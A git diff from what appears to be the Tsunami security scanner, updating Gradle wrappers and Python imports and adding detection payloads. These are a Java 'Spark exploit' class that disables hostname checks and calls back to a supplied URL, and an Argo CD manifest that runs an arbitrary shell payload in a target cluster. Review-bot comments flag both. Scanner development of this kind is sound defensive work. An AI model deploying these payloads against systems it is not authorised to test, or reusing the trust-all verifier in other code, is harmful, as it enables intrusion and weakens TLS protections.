@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/govtech/detectors/cves/cve_2020_3452/gradlew.bat b/govtech/detectors/cves/cve_2020_3452/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/govtech/detectors/cves/cve_2020_3452/gradlew.bat +++ b/govtech/detectors/cves/cve_2020_3452/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/payloads/apache_spark_exposed_api/.gitignore b/payloads/apache_spark_exposed_api/.gitignore new file mode 100644 index 000000000..6b468b62a --- /dev/null +++ b/payloads/apache_spark_exposed_api/.gitignore @@ -0,0 +1 @@ +*.class diff --git a/payloads/apache_spark_exposed_api/README.md b/payloads/apache_spark_exposed_api/README.md new file mode 100644 index 000000000..6a0a4c9b4 --- /dev/null +++ b/payloads/apache_spark_exposed_api/README.md @@ -0,0 +1,6 @@ +## Build payload + +```bash +javac Tsunami.java TsunamiHostnameVerifier.java +jar cvf Tsunami_Apache_Spark_Exploit.jar Tsunami.class TsunamiHostnameVerifier.class +``` diff --git a/payloads/apache_spark_exposed_api/Tsunami.java b/payloads/apache_spark_exposed_api/Tsunami.java new file mode 100644 index 000000000..2c2323c4f --- /dev/null +++ b/payloads/apache_spark_exposed_api/Tsunami.java 
@@ -0,0 +1,16 @@
+import java.net.HttpURLConnection;
+import java.net.URL;
+import javax.net.ssl.HttpsURLConnection;
+
+public class Tsunami {
+
+ public static void main(String[] args) throws Exception {
+
+ // Create and set all-trusting host name verifier to avoid certificate issues
+ HttpsURLConnection.setDefaultHostnameVerifier(new TsunamiHostnameVerifier());
+ // Create HTTP request to resource
+ URL url = new URL(args[0]);
+ HttpURLConnection con = (HttpURLConnection) url.openConnection();
+ con.getInputStream();
+ }
+}
diff --git a/payloads/apache_spark_exposed_api/TsunamiHostnameVerifier.java b/payloads/apache_spark_exposed_api/TsunamiHostnameVerifier.java
new file mode 100644
index 000000000..ce24c45a9
--- /dev/null
+++ b/payloads/apache_spark_exposed_api/TsunamiHostnameVerifier.java
@@ -0,0 +1,9 @@
+import javax.net.ssl.HostnameVerifier;
+import javax.net.ssl.SSLSession;
+
+public class TsunamiHostnameVerifier implements HostnameVerifier {
+ public boolean verify(String arg0, SSLSession arg1) {
+ return true;
+ }
+}
+;
diff --git a/payloads/apache_spark_exposed_api/Tsunami_Apache_Spark_Exploit.jar b/payloads/apache_spark_exposed_api/Tsunami_Apache_Spark_Exploit.jar
new file mode 100644
index 000000000..657ed8d9d
Binary files /dev/null and b/payloads/apache_spark_exposed_api/Tsunami_Apache_Spark_Exploit.jar differ
diff --git a/payloads/argo-cd-exposed-ui/guestbook-ui.jsonnet b/payloads/argo-cd-exposed-ui/guestbook-ui.jsonnet
new file mode 100644
index 000000000..c744a1f43
--- /dev/null
+++ b/payloads/argo-cd-exposed-ui/guestbook-ui.jsonnet
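Review bot: The comment above `setDefaultHostnameVerifier` in `Tsunami.main` says the verifier avoids certificate issues, but a `HostnameVerifier` only waives the host-name match; chain validation by the default trust manager still runs, so an HTTPS callback endpoint with an untrusted certificate would presumably still fail the handshake. I would reword the comment to `// Accept any host name; certificate chain validation is unchanged`. The request also sets no timeouts and never closes the stream, so a slow callback server can keep the submitted job alive on the scanned host; `con.setConnectTimeout(5000); con.setReadTimeout(5000);` before the call (values illustrative) and `con.getInputStream().close();` would bound that. `args[0]` is read without a length check, so a missing argument surfaces as an ArrayIndexOutOfBoundsException rather than a usage message.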
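Review bot: `TsunamiHostnameVerifier.verify` returns true for every host and is installed JVM-wide by `Tsunami.main`, yet the class carries no comment saying this is deliberate and confined to the detection payload; a class comment such as `/** Accepts every host name. Payload-only: never reuse in scanner or plugin code. */` would stop it being copied elsewhere. The trailing `;` after the closing brace is an empty declaration and can be dropped. The prebuilt `Tsunami_Apache_Spark_Exploit.jar` added next to these sources cannot be checked against them from the diff, so recording its checksum in the README beside the build steps, or building it in CI, would make that verifiable.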
@@ -0,0 +1,86 @@
+function (
+ payload=""
+)
+ [
+ {
+ "apiVersion": "v1",
+ "kind": "Service",
+ "metadata": {
+ "name": "nginx",
+ "namespace": "tsunami-security-scanner"
+ },
+ "spec": {
+ "type": "LoadBalancer",
+ "selector": {
+ "app.kubernetes.io/name": "nginx"
+ },
+ "ports": [
+ {
+ "protocol": "TCP",
+ "port": 80,
+ "targetPort": "http"
+ }
+ ]
+ }
+ },
+ {
+ "apiVersion": "v1",
+ "kind": "Namespace",
+ "metadata": {
+ "name": "tsunami-security-scanner"
+ }
+ },
+ {
+ "apiVersion": "apps/v1",
+ "kind": "Deployment",
+ "metadata": {
+ "name": "nginx",
+ "namespace": "tsunami-security-scanner",
+ "labels": {
+ "app.kubernetes.io/name": "nginx"
+ }
+ },
+ "spec": {
+ "replicas": 1,
+ "selector": {
+ "matchLabels": {
+ "app.kubernetes.io/name": "nginx"
+ }
+ },
+ "template": {
+ "metadata": {
+ "labels": {
+ "app.kubernetes.io/name": "nginx"
+ }
+ },
+ "spec": {
+ "initContainers": [
+ {
+ "name": "download-tools",
+ "image": "curlimages/curl:7.78.0",
+ "command": [
+ "/bin/sh",
+ "-c"
+ ],
+ "args": [
+ payload
+ ]
+ }
+ ],
+ "containers": [
+ {
+ "name": "nginx",
+ "image": "nginx:1.24",
+ "ports": [
+ {
+ "name": "http",
+ "containerPort": 80
+ }
+ ]
+ }
+ ]
+ }
+ }
+ }
+ },
+ ]
diff --git a/py_plugins/examples/example_py_vuln_detector.py b/py_plugins/examples/example_py_vuln_detector.py
index cc210687e..def3c48ed 100644
--- a/py_plugins/examples/example_py_vuln_detector.py
+++ b/py_plugins/examples/example_py_vuln_detector.py
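Review bot: The Service in this manifest is `"type": "LoadBalancer"`, which on most cloud clusters provisions an externally reachable address for the nginx pod inside the scanned environment; if the detector only needs the init container's callback, `"type": "ClusterIP"` (or no Service at all) leaves less exposed should cleanup fail. Both images are pinned by tag only (`curlimages/curl:7.78.0`, `nginx:1.24`); pinning them by digest would keep what runs in the target cluster fixed. `payload` goes verbatim to `/bin/sh -c`, so a short comment on the function stating that callers pass only the scanner-generated callback command would document that contract.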
@@ -14,13 +14,13 @@ """Example Python vulnerability detector.""" from absl import logging -from google3.google.protobuf import timestamp_pb2 -from google3.third_party.java_src.tsunami.plugin_server.py import tsunami_plugin -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.http_client import HttpClient -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_generator import PayloadGenerator -from google3.third_party.java_src.tsunami.proto import detection_pb2 -from google3.third_party.java_src.tsunami.proto import plugin_representation_pb2 -from google3.third_party.java_src.tsunami.proto import vulnerability_pb2 +from google.protobuf import timestamp_pb2 +import tsunami_plugin +from common.net.http.http_client import HttpClient +from plugin.payload.payload_generator import PayloadGenerator +import detection_pb2 +import plugin_representation_pb2 +import vulnerability_pb2 PluginInfo = plugin_representation_pb2.PluginInfo diff --git a/py_plugins/examples/example_py_vuln_detector_test.py b/py_plugins/examples/example_py_vuln_detector_test.py index dad634da0..5d50d4d0f 100644 --- a/py_plugins/examples/example_py_vuln_detector_test.py +++ b/py_plugins/examples/example_py_vuln_detector_test.py 
@@ -15,18 +15,18 @@ import unittest.mock as umock from absl.testing import absltest -from google3.google.protobuf import timestamp_pb2 -from google3.third_party.java_src.tsunami.plugin_server.py import tsunami_plugin -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.requests_http_client import RequestsHttpClientBuilder -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_generator import PayloadGenerator -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_secret_generator import PayloadSecretGenerator -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_utility import get_parsed_payload -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.tcs_client import TcsClient -from google3.third_party.java_src.tsunami.proto import detection_pb2 -from google3.third_party.java_src.tsunami.proto import network_service_pb2 -from google3.third_party.java_src.tsunami.proto import reconnaissance_pb2 -from google3.third_party.java_src.tsunami.proto import vulnerability_pb2 -from google3.third_party.tsunami_plugins.py_plugins.examples import example_py_vuln_detector +from google.protobuf import timestamp_pb2 +import tsunami_plugin +from common.net.http.requests_http_client import RequestsHttpClientBuilder +from plugin.payload.payload_generator import PayloadGenerator +from plugin.payload.payload_secret_generator import PayloadSecretGenerator +from plugin.payload.payload_utility import get_parsed_payload +from plugin.tcs_client import TcsClient +import detection_pb2 +import network_service_pb2 +import reconnaissance_pb2 +import vulnerability_pb2 +from third_party.tsunami_plugins.py_plugins.examples import example_py_vuln_detector # Callback server diff --git a/py_plugins/jupyter_exposed_ui/jupyter_exposed_ui_detector.py b/py_plugins/jupyter_exposed_ui/jupyter_exposed_ui_detector.py index faf53cb7b..e27ef815f 100644 
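Review bot: The last rewritten import, `from third_party.tsunami_plugins.py_plugins.examples import example_py_vuln_detector`, keeps a `third_party.tsunami_plugins` prefix while every other import in the hunk was reduced to a top-level module (`tsunami_plugin`, `detection_pb2`, and so on); this looks like a partial strip of the internal path and may not resolve in the open-source layout unless such a package is on the import path. The same pattern appears in the jupyter_exposed_ui and spring_cloud_function test hunks further down. Since the test sits beside the detector in `py_plugins/examples/`, `import example_py_vuln_detector` would match the other imports; please confirm against how the tests are actually run.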
--- a/py_plugins/jupyter_exposed_ui/jupyter_exposed_ui_detector.py +++ b/py_plugins/jupyter_exposed_ui/jupyter_exposed_ui_detector.py @@ -15,15 +15,15 @@ """A Tsunami plugin for detecting exposed UI from Jupyter.""" from absl import logging -from google3.google.protobuf import timestamp_pb2 -from google3.third_party.java_src.tsunami.plugin_server.py import tsunami_plugin -from google3.third_party.java_src.tsunami.plugin_server.py.common.data import network_service_utils -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.http_client import HttpClient -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.http_request import HttpRequest -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.http_status import HttpStatus -from google3.third_party.java_src.tsunami.proto import detection_pb2 -from google3.third_party.java_src.tsunami.proto import plugin_representation_pb2 -from google3.third_party.java_src.tsunami.proto import vulnerability_pb2 +from google.protobuf import timestamp_pb2 +import tsunami_plugin +from common.data import network_service_utils +from common.net.http.http_client import HttpClient +from common.net.http.http_request import HttpRequest +from common.net.http.http_status import HttpStatus +import detection_pb2 +import plugin_representation_pb2 +import vulnerability_pb2 _VULN_DESCRIPTION = ( 'This detector checks whether a unauthenticated Jupyter Notebook is' diff --git a/py_plugins/jupyter_exposed_ui/jupyter_exposed_ui_detector_test.py b/py_plugins/jupyter_exposed_ui/jupyter_exposed_ui_detector_test.py index f09825846..851be9d05 100644 --- a/py_plugins/jupyter_exposed_ui/jupyter_exposed_ui_detector_test.py +++ b/py_plugins/jupyter_exposed_ui/jupyter_exposed_ui_detector_test.py 
@@ -18,20 +18,20 @@ import requests_mock -from google3.third_party.java_src.tsunami.plugin_server.py.common.data import network_endpoint_utils -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.requests_http_client import RequestsHttpClientBuilder -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_generator import PayloadGenerator -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_secret_generator import PayloadSecretGenerator -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_utility import get_parsed_payload -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.tcs_client import TcsClient -from google3.third_party.java_src.tsunami.proto import detection_pb2 -from google3.third_party.java_src.tsunami.proto import network_pb2 -from google3.third_party.java_src.tsunami.proto import network_service_pb2 -from google3.third_party.java_src.tsunami.proto import reconnaissance_pb2 -from google3.third_party.java_src.tsunami.proto import software_pb2 -from google3.third_party.java_src.tsunami.proto import vulnerability_pb2 -from google3.third_party.tsunami_plugins.py_plugins.jupyter_exposed_ui import jupyter_exposed_ui_detector -from google3.third_party.tsunami_plugins.py_plugins.jupyter_exposed_ui.jupyter_exposed_ui_detector import _VULN_REMEDIATION +from common.data import network_endpoint_utils +from common.net.http.requests_http_client import RequestsHttpClientBuilder +from plugin.payload.payload_generator import PayloadGenerator +from plugin.payload.payload_secret_generator import PayloadSecretGenerator +from plugin.payload.payload_utility import get_parsed_payload +from plugin.tcs_client import TcsClient +import detection_pb2 +import network_pb2 +import network_service_pb2 +import reconnaissance_pb2 +import software_pb2 +import vulnerability_pb2 +from third_party.tsunami_plugins.py_plugins.jupyter_exposed_ui import 
jupyter_exposed_ui_detector +from third_party.tsunami_plugins.py_plugins.jupyter_exposed_ui.jupyter_exposed_ui_detector import _VULN_REMEDIATION _TARGET_URL = 'vuln-target.com' diff --git a/py_plugins/spring_cloud_function_cve_202222963/spring_cloud_function_detector.py b/py_plugins/spring_cloud_function_cve_202222963/spring_cloud_function_detector.py index 8f829f812..a470a2b44 100644 --- a/py_plugins/spring_cloud_function_cve_202222963/spring_cloud_function_detector.py +++ b/py_plugins/spring_cloud_function_cve_202222963/spring_cloud_function_detector.py 
@@ -14,18 +14,18 @@ """A Tsunami plugin for detecting CVE-2022-22963.""" import time from absl import logging -from google3.google.protobuf import timestamp_pb2 -from google3.third_party.java_src.tsunami.plugin_server.py import tsunami_plugin -from google3.third_party.java_src.tsunami.plugin_server.py.common.data import network_endpoint_utils -from google3.third_party.java_src.tsunami.plugin_server.py.common.data import network_service_utils -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.http_client import HttpClient -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.http_headers import HttpHeaders -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.http_request import HttpRequest -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_generator import PayloadGenerator -from google3.third_party.java_src.tsunami.proto import detection_pb2 -from google3.third_party.java_src.tsunami.proto import payload_generator_pb2 as pg -from google3.third_party.java_src.tsunami.proto import plugin_representation_pb2 -from google3.third_party.java_src.tsunami.proto import vulnerability_pb2 +from google.protobuf import timestamp_pb2 +import tsunami_plugin +from common.data import network_endpoint_utils +from common.data import network_service_utils +from common.net.http.http_client import HttpClient +from common.net.http.http_headers import HttpHeaders +from common.net.http.http_request import HttpRequest +from plugin.payload.payload_generator import PayloadGenerator +import detection_pb2 +import payload_generator_pb2 as pg +import plugin_representation_pb2 +import vulnerability_pb2 _VULN_PATH = 'functionRouter' diff --git a/py_plugins/spring_cloud_function_cve_202222963/spring_cloud_function_detector_test.py b/py_plugins/spring_cloud_function_cve_202222963/spring_cloud_function_detector_test.py index bf2b3cd31..438ceb0c9 100644 
--- a/py_plugins/spring_cloud_function_cve_202222963/spring_cloud_function_detector_test.py +++ b/py_plugins/spring_cloud_function_cve_202222963/spring_cloud_function_detector_test.py 
@@ -17,23 +17,23 @@ from absl.testing import absltest import requests_mock -from google3.third_party.java_src.tsunami.plugin_server.py import tsunami_plugin -from google3.third_party.java_src.tsunami.plugin_server.py.common.data import network_endpoint_utils -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.requests_http_client import RequestsHttpClientBuilder -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_generator import PayloadGenerator -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_secret_generator import PayloadSecretGenerator -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_utility import get_parsed_payload -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.tcs_client import TcsClient -from google3.third_party.java_src.tsunami.proto import detection_pb2 -from google3.third_party.java_src.tsunami.proto import network_pb2 -from google3.third_party.java_src.tsunami.proto import network_service_pb2 -from google3.third_party.java_src.tsunami.proto import plugin_representation_pb2 -from google3.third_party.java_src.tsunami.proto import reconnaissance_pb2 -from google3.third_party.java_src.tsunami.proto import software_pb2 -from google3.third_party.java_src.tsunami.proto import vulnerability_pb2 -from google3.third_party.tsunami_plugins.py_plugins.spring_cloud_function_cve_202222963 import spring_cloud_function_detector -from google3.third_party.tsunami_plugins.py_plugins.spring_cloud_function_cve_202222963.spring_cloud_function_detector import _VULN_DESCRIPTION -from google3.third_party.tsunami_plugins.py_plugins.spring_cloud_function_cve_202222963.spring_cloud_function_detector import _VULN_PATH +import tsunami_plugin +from common.data import network_endpoint_utils +from common.net.http.requests_http_client import RequestsHttpClientBuilder +from plugin.payload.payload_generator import PayloadGenerator +from 
plugin.payload.payload_secret_generator import PayloadSecretGenerator +from plugin.payload.payload_utility import get_parsed_payload +from plugin.tcs_client import TcsClient +import detection_pb2 +import network_pb2 +import network_service_pb2 +import plugin_representation_pb2 +import reconnaissance_pb2 +import software_pb2 +import vulnerability_pb2 +from third_party.tsunami_plugins.py_plugins.spring_cloud_function_cve_202222963 import spring_cloud_function_detector +from third_party.tsunami_plugins.py_plugins.spring_cloud_function_cve_202222963.spring_cloud_function_detector import _VULN_DESCRIPTION +from third_party.tsunami_plugins.py_plugins.spring_cloud_function_cve_202222963.spring_cloud_function_detector import _VULN_PATH # Callback server